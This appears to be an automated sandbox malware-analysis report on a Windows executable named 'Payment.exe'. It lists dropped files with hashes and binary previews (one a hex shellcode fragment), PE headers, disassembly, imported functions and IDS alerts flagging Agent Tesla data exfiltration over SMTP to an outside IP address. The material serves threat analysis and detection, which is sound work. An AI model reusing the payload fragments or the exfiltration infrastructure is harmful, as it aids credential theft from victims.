                                                        Preview:EA06.....D.SzE..W......2.V(5Z.6.H.M.`....X...S)...h@.....X.T..j.....{.Pl./'..c....{?.IlUIT.W8..R...O\.Le.X..)h..%.K]j.@..,f#..Sat.....L@.5.P..e2.B.M...l_1.......b( ....C......x.5.0..........ZD.eK..j.:...B.N).....cwe...!UP..Ch.._7^.A...~@..DJqX...v..`B..;l..3.......T..f.G..,|1...kt..'R..b.R..1@.......@....>.r.J......H...;z.*.H.B3S.....J.B.,>:.....F....V.M..h.z}.W..h@........?.....w.l..@.Ss..Ws[.y.>...Yx.@*...{...Bk.=../...(<8\./N....z.?e..Q.5.$....d=.{...&..s.e.g....E..<._?.y_.s......r}|._?......!5..R...N..:..Y{..f.I<f1 ..2?M#sN..t.\......dS.t6.I.....U.'..f-...{..c'`...............I.7.h..=..(...p.c7 ....XO...(.a9.,9..Uc...H...h.Eo.....k..lo.\.2.#.Q.r;n?m..y/.......0.Hdz.......4/GU..(.h.n.Q....Y.n.h.A.;..Z.E..4.&.r.^x....Sk.c/{..Ni..k s......Zm....px.}......[......R8S}.......I..}W.K%.YD.i'.Pe..l./..N.2.P.v).Z].cC...4.E..R.L.\9T..G.o$U....<.....D.q\..+T.d.37..m.Z..9J..e.I.b.W.W..D....ht.....xQg...z.Y.Ni.....a.T..}Jm..Z`..m6.B..1....F.P.....A.............
                                                        Process:C:\Users\user\Desktop\Payment.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):9902
                                                        Entropy (8bit):7.589420241366998
                                                        Encrypted:false
                                                        SSDEEP:192:C+cK50L02Jtyl2ftvwmziMVC6baopzBvq5xQtxfChACTtobpcqzLrOOnsqQE+R:h750LRJtyl2ftLCghBmgx6hrTeVcyXOP
                                                        MD5:33839E826D04985CBBD35C20D8D304E3
                                                        SHA1:00484D5F99DEA9BFA4C1AAF8AD985D5AE5CA31C6
                                                        SHA-256:52666D2AFDDE1A10BFEFA7C644A8A488CC7384510D4F55246994837AED155AF2
                                                        SHA-512:3139ABDE0798D843B5223EF13A85E4189F5CAF75D94A176C5BABB61B4FF63D38046544A9C5F51DC49EDF9816A10487BFC50D4137609AA67CB1DFC54FE1A3DD98
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:EA06..p0.M'.)..e4.N'.).......T9..l.0L.s.5..3..s.4.8.......k8.Yls....c..&S...k6...S....1.L&.i..i5.M,S....K.@...7...p. ....P.o...m.X.V........9....3...f....s2.Xf@.]..g3@..h.m.M.......8.l..6.....a........i4........g3Y...c ._..k4...d....H, ......Ac.H..g...(.F..=d....>....C`....@02..N@...u......Y..ab.M.]>.$....M.x>;$....N.j.;%....X.j.;%......j.;,....P'.b.5... .^..f./Z..@F.6.z..G......`......i..G../Z...zqd...l.;.........|......7...}3{(........;^..l =..p.........3p.o....,.......x.....H<.lX.:...b.....,. ...2...f.[...K.)....b..i|v F......X......`....,.9....5...._..l......>K.....ir.e....[4..d..f.y.....,.....S >..p...........s9.... !..Y....f...ja4....ea.h,.p.....,.a8.,..3........f.....f ....,j.0..&...J......f ....6K%.ke..f....L..;2.X...4.Y.V@.Fn.....f@....l..05.....!;3.X...c )D.g6... ...'&`....,f.6..&....r...Brh.....l...i2...B....@.......d.L.`!.....P...@X5d..lSK...9...!;5.X...cVY......'.B...,vl.!..>.a..l...M..@...X...b.M&.X..B.a.Q...sp..X..9..o5..f.!...,vn......d...
                                                        Process:C:\Users\user\Desktop\Payment.exe
                                                        File Type:ASCII text, with very long lines (28720), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):28720
                                                        Entropy (8bit):3.5971472643342133
                                                        Encrypted:false
                                                        SSDEEP:768:wiTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNboE+I026c024vfF3if6L:wiTZ+2QoioGRk6ZklputwjpjBkCiw2Rk
                                                        MD5:9447223DB34835958033A65ED42D0A32
                                                        SHA1:0C6F202979F1B81D5D719AD5FF114626F6BC6A64
                                                        SHA-256:2ADEDBEF4DCF1AECC6FFD84E6769E2A222C5D6621D02DBDDAE095573C5437C3E
                                                        SHA-512:EFE9ADD9289B8F9E845942370D9492B03779EFCA6BBD75F94E8EF8171683E9B8C1264021777693D0A38D6391F5B6533F5C31139510294B5D52A6C9A565A708B4
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:048B4C24088B008B093BC8760483C8FFC31BC0F7D8C38B0x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffffba6c0000006689957cffffffb86c00000066
                                                        Process:C:\Users\user\Desktop\Payment.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):240128
                                                        Entropy (8bit):6.75581145510075
                                                        Encrypted:false
                                                        SSDEEP:6144:e01xYm6nIN/nn5Ui9DVMzWaZBHgM+HUE4WaJEYRxP5dJAT+iu:pJhn5p9DAWPb4vEY93AT+iu
                                                        MD5:96F1853F2F7C00485D710A9047CFC858
                                                        SHA1:4C2DADC3F3A2C77F6D76B61F562BC95B4B008EC8
                                                        SHA-256:8798A866E079C118437258474CA297E545FF6817C6460B3508413C48B991B95D
                                                        SHA-512:7BFF0D329B7025FC230EAF6D4DF9CDB5FF105FC62CE21AD68AF4B1D1D421B710BB5D819CC43AE3CF9003F94C93E9560FF5FAD0376A5097B482AC75523BA277E0
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:...7HAEWGJPJ..R2.XAUZMGH.7KAEWCJPJCOR28XAUZMGHB7KAEWCJPJCOR2.XAUTR.FB.B.d.B..k.';A.(3:=?&%bT*/+87j2/c='\.1/u...h/X/$kZN@tJCOR28X..ZM.IA7N.N1CJPJCOR2.XCTQLLHB.HAE_CJPJCO|.;XAuZMG.A7KA.WCjPJCMR2<XAUZMGHF7KAEWCJPJGOR08XAUZMEH..KAUWCZPJCOB28HAUZMGHR7KAEWCJPJCO..;X.UZMG.A7.DEWCJPJCOR28XAUZMGHB.HAIWCJPJCOR28XAUZMGHB7KAEWCJPJCOR28XAUZMGHB7KAEWCJPJCOR.8XIUZMGHB7KAEWKjPJ.OR28XAUZMGHlC.91WCJd.@OR.8XA.YMGJB7KAEWCJPJCOR2.XA5t?4:!7KA.RCJP.@OR48XA.YMGHB7KAEWCJPJ.ORr.*$95.GHN7KAE.@JPHCOR.;XAUZMGHB7KAEW.JP.COR28XAUZMGHB7KAU.@JPJCO.28XCU_M..@7OpDW@JPJBOR48XAUZMGHB7KAEWCJPJCOR28XAUZMGHB7KAEWCJPJCOR28XAUG......*}@2M.i.U.[..I..1.xD.P.8^..._...}8A..7.Nu..Y...G.PD,[...s!N&M".=l@3.%....pf<.|.G+.9...=}.\>|.|...na...X7....;..[7,{;=7$'.. #61#.H.NR28X......."9..nI_Tw]*d...n_?...;WCJ4JCO 28X UZM.HB7$AEW-JPJ=OR2FXAU.MGH.7KArWCJuJCO?28XeUZM9HB7.<JX...#0.28XAUo..x.Z.....}..y#.F.#m...,.|..@..E8.4..u..O.&..Ue Gf..MQLGJP5<[MhT.....IEARAMTIOr\y..t.k.{...4....0.3R28XAU.MG.B7K..W.JPJ.O.2..AUZ.H.7.A...J
                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Entropy (8bit):6.975842962714193
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:Payment.exe
                                                        File size:1'062'912 bytes
                                                        MD5:872fc876d25908a93236dcf98e09e3de
                                                        SHA1:06da1381d9aaa978ace25c409a59c3d6560975c0
                                                        SHA256:a6cd55461ca16e33b153c509417d91eec660cc6d447764c9a312a0ad871ca9c5
                                                        SHA512:4f1750c69221ecea05d66a5eb92c2cf821fcc080c3593ac7a3874d7cc9fc8f2ce1d9263329f419cc43188dda09bdbdbb412a5c6bb370aec70a9830588b07d586
                                                        SSDEEP:24576:0AHnh+eWsN3skA4RV1Hom2KXMmHaF+CoEFoTiy5:Dh+ZkldoPK8YaF+DH
                                                        TLSH:8835AD0273D1C036FFABA2739B6AF24156BD79254123852F13981DB9BD701B2273E663
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..
                                                        Icon Hash:aaf3e3e3938382a0
                                                        Entrypoint:0x42800a
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x662A4D52 [Thu Apr 25 12:32:18 2024 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:5
                                                        OS Version Minor:1
                                                        File Version Major:5
                                                        File Version Minor:1
                                                        Subsystem Version Major:5
                                                        Subsystem Version Minor:1
                                                        Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                        Instruction
                                                        call 00007F3A68FB383Dh
                                                        jmp 00007F3A68FA65F4h
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        push edi
                                                        push esi
                                                        mov esi, dword ptr [esp+10h]
                                                        mov ecx, dword ptr [esp+14h]
                                                        mov edi, dword ptr [esp+0Ch]
                                                        mov eax, ecx
                                                        mov edx, ecx
                                                        add eax, esi
                                                        cmp edi, esi
                                                        jbe 00007F3A68FA677Ah
                                                        cmp edi, eax
                                                        jc 00007F3A68FA6ADEh
                                                        bt dword ptr [004C41FCh], 01h
                                                        jnc 00007F3A68FA6779h
                                                        rep movsb
                                                        jmp 00007F3A68FA6A8Ch
                                                        cmp ecx, 00000080h
                                                        jc 00007F3A68FA6944h
                                                        mov eax, edi
                                                        xor eax, esi
                                                        test eax, 0000000Fh
                                                        jne 00007F3A68FA6780h
                                                        bt dword ptr [004BF324h], 01h
                                                        jc 00007F3A68FA6C50h
                                                        bt dword ptr [004C41FCh], 00000000h
                                                        jnc 00007F3A68FA691Dh
                                                        test edi, 00000003h
                                                        jne 00007F3A68FA692Eh
                                                        test esi, 00000003h
                                                        jne 00007F3A68FA690Dh
                                                        bt edi, 02h
                                                        jnc 00007F3A68FA677Fh
                                                        mov eax, dword ptr [esi]
                                                        sub ecx, 04h
                                                        lea esi, dword ptr [esi+04h]
                                                        mov dword ptr [edi], eax
                                                        lea edi, dword ptr [edi+04h]
                                                        bt edi, 03h
                                                        jnc 00007F3A68FA6783h
                                                        movq xmm1, qword ptr [esi]
                                                        sub ecx, 08h
                                                        lea esi, dword ptr [esi+08h]
                                                        movq qword ptr [edi], xmm1
                                                        lea edi, dword ptr [edi+08h]
                                                        test esi, 00000007h
                                                        je 00007F3A68FA67D5h
                                                        bt esi, 03h
                                                        Programming Language:
                                                        • [ASM] VS2013 build 21005
                                                        • [ C ] VS2013 build 21005
                                                        • [C++] VS2013 build 21005
                                                        • [ C ] VS2008 SP1 build 30729
                                                        • [IMP] VS2008 SP1 build 30729
                                                        • [ASM] VS2013 UPD5 build 40629
                                                        • [RES] VS2013 build 21005
                                                        • [LNK] VS2013 UPD5 build 40629
                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xbc0cc0x17c.rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xc80000x39148.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x1020000x7134.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa4b500x40.rdata
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000x8dfdd0x8e000310e36668512d53489c005622bb1b4a9False0.5735602580325704data6.675248351711057IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rdata0x8f0000x2fd8e0x2fe00748cf1ab2605ce1fd72d53d912abb68fFalse0.32828818537859006data5.763244005758284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data0xbf0000x8f740x5200aae9601d920f07080bdfadf43dfeff12False0.1017530487804878data1.1963819235530628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .rsrc0xc80000x391480x392001a1be00e6d8ce7c21497f9ddca782370False0.8849194816739606data7.788947192788363IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0x1020000x71340x7200f04128ad0f87f42830e4a6cdbc38c719False0.7617530153508771data6.783955557128661IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_ICON0xc85a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                        RT_ICON0xc86d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                        RT_ICON0xc87f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                        RT_ICON0xc89200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                        RT_ICON0xc8c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                        RT_ICON0xc8d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                        RT_ICON0xc9bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                        RT_ICON0xca4800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                        RT_ICON0xca9e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                        RT_ICON0xccf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                        RT_ICON0xce0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                        RT_MENU0xce4a00x50dataEnglishGreat Britain0.9
                                                        RT_STRING0xce4f00x594dataEnglishGreat Britain0.3333333333333333
                                                        RT_STRING0xcea840x68adataEnglishGreat Britain0.2747909199522103
                                                        RT_STRING0xcf1100x490dataEnglishGreat Britain0.3715753424657534
                                                        RT_STRING0xcf5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                        RT_STRING0xcfb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                        RT_STRING0xd01f80x466dataEnglishGreat Britain0.3605683836589698
                                                        RT_STRING0xd06600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                        RT_RCDATA0xd07b80x303dedata1.000359315377686
                                                        RT_GROUP_ICON0x100b980x76dataEnglishGreat Britain0.6610169491525424
                                                        RT_GROUP_ICON0x100c100x14dataEnglishGreat Britain1.25
                                                        RT_GROUP_ICON0x100c240x14dataEnglishGreat Britain1.15
                                                        RT_GROUP_ICON0x100c380x14dataEnglishGreat Britain1.25
                                                        RT_VERSION0x100c4c0x10cdataEnglishGreat Britain0.5895522388059702
                                                        RT_MANIFEST0x100d580x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                        DLLImport
                                                        WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                        VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                        WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                        COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                        MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                        WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                        PSAPI.DLLGetProcessMemoryInfo
                                                        IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                        USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                        UxTheme.dllIsThemeActive
                                                        KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                        USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                        GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                        COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                        ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                        SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                        ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                        OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
                                                        Language of compilation systemCountry where language is spokenMap
                                                        EnglishGreat Britain
                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                        04/26/24-10:06:22.580286TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49727587192.168.2.5208.91.198.143
                                                        04/26/24-10:06:22.580370TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity49727587192.168.2.5208.91.198.143
                                                        04/26/24-10:06:22.580370TCP2855245ETPRO TROJAN Agent Tesla Exfil via SMTP49727587192.168.2.5208.91.198.143
                                                        04/26/24-10:06:22.580370TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249727587192.168.2.5208.91.198.143
                                                        04/26/24-10:06:22.580370TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49727587192.168.2.5208.91.198.143
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Apr 26, 2024 10:06:16.772026062 CEST49725443192.168.2.5104.26.12.205
                                                        Apr 26, 2024 10:06:16.772078037 CEST44349725104.26.12.205192.168.2.5
                                                        Apr 26, 2024 10:06:16.772171974 CEST49725443192.168.2.5104.26.12.205
                                                        Apr 26, 2024 10:06:16.814868927 CEST49725443192.168.2.5104.26.12.205
                                                        Apr 26, 2024 10:06:16.814896107 CEST44349725104.26.12.205192.168.2.5
                                                        Apr 26, 2024 10:06:17.078241110 CEST44349725104.26.12.205192.168.2.5
                                                        Apr 26, 2024 10:06:17.078389883 CEST49725443192.168.2.5104.26.12.205
                                                        Apr 26, 2024 10:06:17.093013048 CEST49725443192.168.2.5104.26.12.205
                                                        Apr 26, 2024 10:06:17.093048096 CEST44349725104.26.12.205192.168.2.5
                                                        Apr 26, 2024 10:06:17.093527079 CEST44349725104.26.12.205192.168.2.5
                                                        Apr 26, 2024 10:06:17.148490906 CEST49725443192.168.2.5104.26.12.205
                                                        Apr 26, 2024 10:06:17.197752953 CEST49725443192.168.2.5104.26.12.205
                                                        Apr 26, 2024 10:06:17.244127035 CEST44349725104.26.12.205192.168.2.5
                                                        Apr 26, 2024 10:06:17.399005890 CEST44349725104.26.12.205192.168.2.5
